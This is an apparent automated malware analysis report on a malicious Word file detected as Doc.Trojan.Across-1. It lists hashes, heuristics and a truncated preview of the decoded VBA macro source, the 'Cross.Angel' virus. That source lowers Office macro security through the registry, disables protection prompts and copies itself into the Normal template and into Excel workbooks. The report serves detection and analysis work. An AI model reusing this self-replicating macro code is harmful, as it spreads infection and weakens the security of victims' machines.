Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fd4ed91505c87da6…

MALICIOUS

Office (OLE)

44.5 KB Created: 2000-03-22 16:28:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 87b7e15f63e9ef3c56494dc9721d0b07 SHA-1: 81068ffdf0767aaca1277980bf1d5ffe743d308e SHA-256: fd4ed91505c87da67e611721a544b9b2bf442855cc0d376566effcb3d723524c
280 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros that attempt to disable macro security by modifying registry keys related to Office security settings. It also attempts to inject code into the Normal template, likely to establish persistence. The ClamAV detection 'Doc.Trojan.Across-1' further supports its malicious nature.

Heuristics 5

  • ClamAV: Doc.Trojan.Across-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Across-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 27921 bytes
SHA-256: ce2ec774a495e3a6052cfb3f01f133a4466c23003f561aac0228b0943a3d9d1a
Detection
ClamAV: Doc.Trojan.Across-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Cross.Angel
Private Sub Document_Close()
On Error Resume Next
Const ˆ»¾™Š = "' Cross.Angel", •Ǥ Ÿ = 132, µÈÇŠ¿ = "9.0", À©¸Ë¬ = "Macro", ˶ž½œ = "Tools", ¯¹­®§ = &H1, ¯¹­®§_ = &H0, ¯¶˜™² = 0, ¢Â¶¥• = 1, »…¨�Ž = 12, µ—Ê·¦ = "excel.application", ¼Æ±¬• = "DieseArbeitsmappe"
Application.EnableCancelKey = (Rnd * ¯¶˜™²)
If Application.Version = µÈÇŠ¿ Then
    Application.CommandBars(À©¸Ë¬).Controls((¢Â¶¥• + ¢Â¶¥• + ¢Â¶¥•)).Enabled = (Rnd * ¯¶˜™²)
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = ¯¹­®§
Else
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ¯¹­®§_
    Application.CommandBars(˶ž½œ).Controls(»…¨�Ž).Enabled = (Rnd * ¯¶˜™²)
    Options.VirusProtection = (Rnd * ¯¶˜™²)
End If
Options.SaveNormalPrompt = (Rnd * ¯¶˜™²)
’¸„„„ = ‚–˜¤�(ThisDocument.VBProject.VBComponents(¢Â¶¥•).CodeModule.Lines(¢Â¶¥•, •Ǥ Ÿ))
If MacroContainer = ActiveDocument Then Set µˆ˜ˆŸ = NormalTemplate Else Set µˆ˜ˆŸ = ActiveDocument
With µˆ˜ˆŸ.VBProject.VBComponents(¢Â¶¥•).CodeModule
    If .Lines(¢Â¶¥•, ¢Â¶¥•) <> ˆ»¾™Š Then
        .DeleteLines ¢Â¶¥•, .CountOfLines
        .InsertLines ¢Â¶¥•, ’¸„„„
        If µˆ˜ˆŸ = ActiveDocument Then ActiveDocument.SaveAs ActiveDocument.FullName
    End If
End With
If System.PrivateProfileString("c:\.ini", "Carinthia", "Excel") <> ¢Â¶¥• Then
Set ´°ƒˆ� = GetObject(, µ—Ê·¦)
If ´°ƒˆ� = "" Then Set ´°ƒˆ� = CreateObject(µ—Ê·¦): ª±›¤Ã = ¢Â¶¥•
If ª±›¤Ã <> ¢Â¶¥• Then
    For Each †�„–À In ´°ƒˆ�.Workbooks
       With †�„–À.VBProject.VBComponents(¼Æ±¬•).CodeModule
            If .Lines(¢Â¶¥•, ¢Â¶¥•) <> ˆ»¾™Š Then
                .DeleteLines ¢Â¶¥•, .CountOfLines
                .InsertLines ¢Â¶¥•, ’¸„„„
                If †�„–À.Path <> "" Then †�„–À.Save Else †�„–À.SaveAs †�„–À.FullName
            End If
        End With
    Next
Else
    For †�„–À = ¢Â¶¥• To ´°ƒˆ�.Application.RecentFiles.Maximum
        ´°ƒˆ�.Application.RecentFiles(†�„–À).Open
            With ´°ƒˆ�.Application.Workbooks(Application.RecentFiles(1).Name).VBProject.VBComponents(¼Æ±¬•).CodeModule
                If .Lines(¢Â¶¥•, ¢Â¶¥•) <> ˆ»¾™Š Then
                    .DeleteLines ¢Â¶¥•, .CountOfLines
                    .InsertLines ¢Â¶¥•, ’¸„„„
                End If
            End With
        ´°ƒˆ�.Application.Workbooks(Application.RecentFiles(1).Name).Close ¢Â¶¥•
    Next
    ´°ƒˆ�.Quit
End If
System.PrivateProfileString("c:\.ini", "Carinthia", "Excel") = ¢Â¶¥•
End If
If Minute(Now()) = Int(Rnd * 60) + 1 Then MsgBox "Why I lost my angel? Can't live without you!", vbQuestion, "Cross.Angel by jackie-/Lz0NT/MVT"
If System.PrivateProfileString("c:\.ini", "Carinthia", "Word") <> ¢Â¶¥• Then System.PrivateProfileString("c:\.ini", "Carinthia", "Word") = ¢Â¶¥•
End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
Const ˆ»¾™Š = "' Cross.Angel", •Ǥ Ÿ = 132, µÈÇŠ¿ = "9.0", À©¸Ë¬ = "Macro", ˶ž½œ = "Tools", ¯¶˜™² = 0, ¢Â¶¥• = 1, »…¨�Ž = 10, µ—Ê·¦ = "word.application", ¼Æ±¬• = "DieseArbeitsmappe"
Application.EnableCancelKey = (Rnd * ¯¶˜™²)
If UCase(Dir("c:\.reg")) <> ".REG" Then
Open "c:\.reg" For Output As #1
    Print #1, "REGEDIT4"
If Application.Version = µÈÇŠ¿ Then
    Application.CommandBars(À©¸Ë¬).Controls((¢Â¶¥• + ¢Â¶¥• + ¢Â¶¥•)).Enabled = (Rnd * ¯¶˜™²)
    Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]"
    Print #1, """Level""=dword:00000001"
    Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"
    Print #1, """Level""=dword:00000001"
Else
    Application.CommandBars(˶ž½œ).Controls(»…¨�Ž).Enabled = (Rnd * ¯¶˜™²)
    Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]"
    Print #1, """Options6""=dword:00000000
... (truncated)